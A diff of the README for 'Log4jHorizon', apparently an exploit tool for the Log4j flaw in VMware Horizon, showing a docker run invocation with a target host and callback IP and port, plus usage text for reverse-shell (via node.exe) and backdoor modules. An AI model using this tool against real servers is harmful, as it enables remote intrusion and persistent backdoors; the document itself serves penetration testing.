puzzlepeaches/Log4jHorizon/README.md

     && cd Log4jHorizon && docker build -t Log4jHorizon .
 ```

 To run the container, run a command similar to the following with your command line flags appended.
-Note that the container will not catch the reverse shell.
+Note that the container will not catch a reverse shell.
 You need to create a ncat listener in a separate shell session:

 ```
+docker run -it -p 1389:1389 Log4jHorizon \
+    -r -t horizon.acme.com -i 192.168.1.1 -p 4444
 ```

 # Usage

 ```
-usage: exploit.py [-h] -u URL -i CALLBACK -p PORT
+usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

-arguments:
+optional arguments:
-  -h, --help            show this help message and exit -u URL, --url URL     VMWare Horizon base URL
+  -h, --help            show this help message and exit -t URL, --target URL  VMWare Horizon IP
+  -i CALLBACK, --ip CALLBACK
+                        Callback IP for payload delivery and reverse shell.
+  -p PORT, --port PORT  Callback port for reverse shell.
+  -r, --revshell        Module to establish reverse shell using node.exe.
+  -b, --backdoor        Module to add backdoor.
 ```

 # Examples